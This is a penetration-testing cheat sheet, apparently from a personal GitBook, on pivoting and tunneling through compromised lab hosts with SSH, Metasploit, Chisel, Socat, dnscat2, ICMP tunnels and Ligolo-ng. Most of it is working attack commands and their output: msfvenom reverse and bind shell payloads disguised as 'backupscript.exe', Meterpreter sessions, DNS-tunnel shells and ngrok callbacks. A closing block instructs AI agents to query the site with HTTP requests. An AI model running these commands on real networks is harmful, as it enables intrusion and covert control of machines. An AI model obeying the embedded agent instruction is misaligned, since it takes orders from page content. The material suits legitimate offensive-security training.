# Pivot, Tunneling and Port Forwarding
## SSH
### Local port forwarding
Mysql port 3306 on victim localhost: `netstat -tulpn`
```shell-session
ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
```
The `-L` command tells the SSH client to request the SSH server to forward all the data we send via the port `1234` to `localhost:3306` on the Ubuntu server.
```shell-session
$ nmap -v -sV -p1234 localhost
PORT STATE SERVICE VERSION
1234/tcp open mysql MySQL 8.0.28-0ubuntu0.20.04.3
```
#### Web server listening on localhost
```
user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33209 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:37285 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:43765 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
```
```
127.0.0.1:8080
```
```
ssh -L 8888:localhost:8080 user@box.htb
```
### Forwarding multiple ports
```shell-session
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64
```
### Dynamic Port Forwarding with SSH
```shell-session
ssh -D 9050 ubuntu@10.129.202.64
```
```shell-session
$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
```
```shell-session
proxychains nmap -v -sn 172.16.5.1-200
```
#### - sT
```shell-session
proxychains nmap -v -Pn -sT 172.16.5.19
```
### Remote / reverse port forward
```shell-session
ssh -R :8080:0.0.0.0:8000 ubuntu@ -vN
```
1. Attacker host
**Create user**
```
sudo adduser tunnel
sudo usermod -aG sudo tunnel
```
**Configue SSH Server**
```
vim /etc/ssh/sshd_config
```
Add
```
PasswordAuthentication yes
AllowUsers tunnel
Port 2222
```
**Restart SSH Server**
```
sudo systemctl restart sshd
```
or inside a Docker
```
[Jan 18, 2025 - 03:43:07 (EST)] exegol-default /workspace # sudo mkdir -p /run/sshd
[Jan 18, 2025 - 03:43:44 (EST)] exegol-default /workspace # sudo chmod 0755 /run/sshd
[Jan 18, 2025 - 03:43:52 (EST)] exegol-default /workspace # /usr/sbin/sshd
[Jan 18, 2025 - 03:43:58 (EST)] exegol-default /workspace # service ssh status
sshd is running.
```
2 - On victim - Connect to our host
{% hint style="info" %}
*By default, proxychains is on port 1080*
{% endhint %}
```
ssh tunnel@10.8.1.254 -R 1080 -p 2222 -N
```
Attacker host:
```
# proxychains nmap -p 389,445 -Pn 172.16.41.14 -sT
```
## WinSSH
{% embed url="" %}
{% embed url="" %}
## Metasploit
### MSF's SOCKS Proxy
```shell-session
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 9050 yes The port to listen on
VERSION 4a yes The SOCKS version to use (Accepted: 4a,
5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
```
proxychains:
```shell-session
socks4 127.0.0.1 9050
```
### Autoroute
```shell-session
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.
[*] Post module execution completed
```
or
```shell-session
meterpreter > run autoroute -s 172.16.5.0/23
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[*] Use the -p option to list all active routes
```
#### Listing autoroute
```shell-session
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.129.0.0 255.255.0.0 Session 1
172.16.4.0 255.255.254.0 Session 1
172.16.5.0 255.255.254.0 Session 1
```
test
```shell-session
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
```
### MSF local port forward
```shell-session
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389
```
The above command requests the Meterpreter session to start a listener on our attack host's local port (`-l`) `3300` and forward all the packets to the remote (`-r`) Windows server `172.16.5.19` on `3389` port (`-p`) via our Meterpreter session.
```shell-session
xfreerdp /v:localhost:3300 /u:victor /p:pass@123
```
### Meterpreter Reverse Port Forwarding
```shell-session
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234
```
```shell-session
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 8081
LPORT => 8081
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8081
```
We can now create a reverse shell payload that will send a connection back to our Ubuntu server on `172.16.5.129`:`1234` when executed on our Windows host. Once our Ubuntu server receives this connection, it will forward that to `attack host's ip`:`8081` that we configured.
```shell-session
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe
```
```shell-session
[*] Started reverse TCP handler on 0.0.0.0:8081
[*] Sending stage (200262 bytes) to 10.10.14.18
[*] Meterpreter session 2 opened (10.10.14.18:8081 -> 10.10.14.18:40173 ) at 2022-03-04 15:26:14 -0500
meterpreter > shell
Process 2336 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\>
```
### Resources
{% embed url="" %}
{% embed url="" %}
## Proxychains
`proxychains -q ` : quiet mode
Nmap over proxychains: `proxychains -q nmap -sT IP PORT`
## tun2socks
{% embed url="" %}
## Chisel
{% embed url="" %}
{% embed url="" %}
### Socks4
```
user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
```
```
# ./chisel server -v -p 1234 --reverse
```
```
user@box:/tmp$ ./chisel client 10.10.14.136:1234 R:8080:127.0.0.1:8080
```
```
# proxychains curl http://127.0.0.1:8080
```
proxychains not working - try without proxychains
```
# curl http://127.0.0.1:8080
<--SNIP-->
```
### Socks5
```shell-session
0xss0rz@htb[/htb]$ cat /etc/proxychains.conf
[ProxyList]
socks5 127.0.0.1 1080
```
```shell-session
0xss0rz@htb[/htb]$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ gzip -d chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ mv chisel_* chisel && chmod +x ./chisel
0xss0rz@htb[/htb]$ sudo ./chisel server --reverse
2022/10/10 07:26:15 server: Reverse tunneling enabled
2022/10/10 07:26:15 server: Fingerprint 58EulHjQXAOsBRpxk232323sdLHd0r3r2nrdVYoYeVM=
2022/10/10 07:26:15 server: Listening on http://0.0.0.0:8080
```
```cmd-session
C:\htb> c:\tools\chisel.exe client 10.10.14.33:8080 R:socks
2022/10/10 06:34:19 client: Connecting to ws://10.10.14.33:8080
2022/10/10 06:34:20 client: Connected (Latency 125.6177ms)
```
or choose an other port
```shell-session
./chisel server -v -p 1234 --socks5
```
## Socat
### Socat Reverse shell
On pivot host
```shell-session
ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
```
Socat will listen on localhost on port `8080` and forward all the traffic to port `80` on our attack host (10.10.14.18).
```shell-session
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
```
```shell-session
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 80
lport => 80
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:80
```
```shell-session
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor
```
### Socat Bind shell
```shell-session
$ msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupjob.exe
```
`socat bind shell` listener, which listens on port `8080` and forwards packets to Windows server `8443`.
On pivot machine:
```shell-session
ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
```
```shell-session
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 10.129.202.64
RHOST => 10.129.202.64
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.129.202.64:8080
```
```shell-session
[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor
```
## Plink
If the host is older and PuTTY is present (or we can find a copy on a file share), Plink can be our path to victory. We can use it to create our pivot and potentially avoid detection a little longer.
{% embed url="" %}
```cmd-session
plink -ssh -D 9050 ubuntu@10.129.15.50
```
Proxifier can be used to start a SOCKS tunnel via the SSH session we created.
Portable version :
{% embed url="" %}
## SSHuttle
removes the need to configure proxychains. However, this tool only works for pivoting over SSH and does not provide other options for pivoting
```shell-session
sudo apt-get install sshuttle
```
```shell-session
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
```
## Rpivot
```shell-session
sudo git clone https://github.com/klsecservices/rpivot.git
```
```shell-session
sudo apt-get install python2.7
```
```shell-session
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
```
```shell-session
scp -r rpivot ubuntu@:/home/ubuntu/
```
run client from pivot machine:
```shell-session
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
```
HTTP proxy and NTLM auth
```shell-session
python client.py --server-ip --server-port 8080 --ntlm-proxy-ip --ntlm-proxy-port 8081 --domain --username --password
```
configure proxychains to pivot over our local server on 127.0.0.1:9050
```shell-session
proxychains firefox-esr 172.16.5.135:80
```
## Netsh
```cmd-session
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
```
```cmd-session
C:\Windows\system32> netsh.exe interface portproxy show v4tov4
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ----------
10.129.42.198 8080 172.16.5.25 3389
```
## DNScat2
DNS Tunneling
```shell-session
$ git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
```
```shell-session
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
```
Doesn't work on Exegol => Ubuntu
```
sudo apt install ruby-dev
sudo apt install gem
sudo apt install ruby-rubygems
export PATH="$PATH:$HOME/.rvm/bin"
```
Will provide us the secret key
```shell-session
git clone https://github.com/lukebaggett/dnscat2-powershell.git
```
Import dnscat to windows victim
```
Set-ExecutionPolicy Unrestricted
```
```powershell-session
PS C:\htb> Import-Module .\dnscat2.ps1
```
```powershell-session
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
```
```shell-session
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2>
```
```shell-session
nscat2> ?
Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
```
```shell-session
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
exec (OFFICEMANAGER) 1>
```
## ICMP Tunneling
```shell-session
git clone https://github.com/utoni/ptunnel-ng.git
```
```shell-session
sudo ./autogen.sh
```
```shell-session
scp -r ptunnel-ng ubuntu@10.129.202.64:~/
```
```shell-session
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22
```
-r: attacker host
```shell-session
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
```
```shell-session
ssh -p2222 -lubuntu 127.0.0.1
```
Port forward:
```shell-session
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
```
```shell-session
$ proxychains nmap -sV -sT 172.16.5.19 -p3389
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
```
## SocksOverRDP
{% embed url="" %}
{% embed url="" %}
Copy the `SocksOverRDPx64.zip` on the target
Load dll
```cmd-session
C:\Users\htb-student\Desktop\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
```
Connect to 172.16.5.19 over RDP using `mstsc.exe`, and we should receive a prompt that the SocksOverRDP plugin is enabled, and it will listen on 127.0.0.1:1080
We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges.
After starting our listener, we can transfer Proxifier portable to the Windows 10 target (on the 10.129.x.x network), and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port
Profile > Proxyserver Add 127.0.0.1 port 1080 Socks version5
With Proxifier configured and running, we can start mstsc.exe, and it will use Proxifier to pivot all our traffic via 127.0.0.1:1080, which will tunnel it over RDP to 172.16.5.19, which will then route it to 172.16.6.155 using SocksOverRDP-server.exe.
***
## Ligolo-ng - The best tool
{% embed url="" %}
#### References
{% embed url="" %}
Moving pivot from different hosts
{% embed url="" %}
{% embed url="" %}
```
[Mar 21, 2024 - 02:16:03 (EDT)] exegol-zephyr ligolo # sudo ip tuntap add user root mode tun ligolo
[Mar 21, 2024 - 02:16:15 (EDT)] exegol-zephyr ligolo # sudo ip link set ligolo up
[Mar 21, 2024 - 02:16:30 (EDT)] exegol-zephyr ligolo # scp lin-agent riley@10.10.110.35:/tmp/0xss0rz/lin-agent
riley@10.10.110.35's password:
lin-agent 100% 4572KB 4.9MB/s 00:00
[Mar 21, 2024 - 02:20:28 (EDT)] exegol-zephyr ligolo #
```
```
./lin-proxy -selfcert -laddr 0.0.0.0:443
```
```
riley@mail:/tmp/0xss0rz$ chmod +x lin-agent
riley@mail:/tmp/0xss0rz$ ./lin-agent -connect 10.10.14.4:443 -ignore-cert
```
```
ligolo-ng » INFO[0026] Agent joined. name=riley@mail remote="10.10.110.35:46489"
ligolo-ng » session
? Specify a session : 1 - #1 - riley@mail - 10.10.110.35:46489
[Agent : riley@mail] » start
[Agent : riley@mail] » INFO[0315] Starting tunnel to riley@mail
```
```
[Mar 21, 2024 - 02:25:58 (EDT)] exegol-zephyr /workspace # sudo ip route add 192.168.110.0/24 dev ligolo
```
### Double Pivot (and more)
***1st Pivot***
```
sudo ip tuntap add user root mode tun ligolo
```
```
sudo ip link set ligolo up
```
```
./lin-proxy -selfcert -laddr 0.0.0.0:11601
```
```
./lin-agent -connect 10.10.14.2:11601 -ignore-cert
```
```
sudo ip route add 172.16.1.0/24 dev ligolo
```
***2nd Pivot***
Create a new interface
```
sudo ip tuntap add user root mode tun ligolo2
```
```
sudo ip link set ligolo2 up
```
```
./lin-agent -connect 10.10.14.2:11601 -ignore-cert
```
```
start --tun ligolo2
```
```
sudo ip route add 172.16.2.0/24 dev ligolo2
```
3rd Pivot - the same thing (create new interface, tunnel via the new interface), if the subnet is the same, don't forget to delete old routes
```
sudo ip route del 172.16.2.0/24 dev ligolo2
```
### Reverse shell - File Transfer
{% embed url="" %}
```
## Shell on pivot adress (172.16.8.120)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.120 LPORT=1234 -f aspx > rs.aspx
```
```
## On ligolo, create listener to forward port
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444
```
```
##On host
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
```
## Tunnel to localhost
### Bore
{% embed url="" %}
### Ngrock
{% embed url="" %}
```
#1
./ngrok tcp 4444
#2
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13757 R > hack.php
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/post-exploitation/pivot-tunneling-and-port-forwarding.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.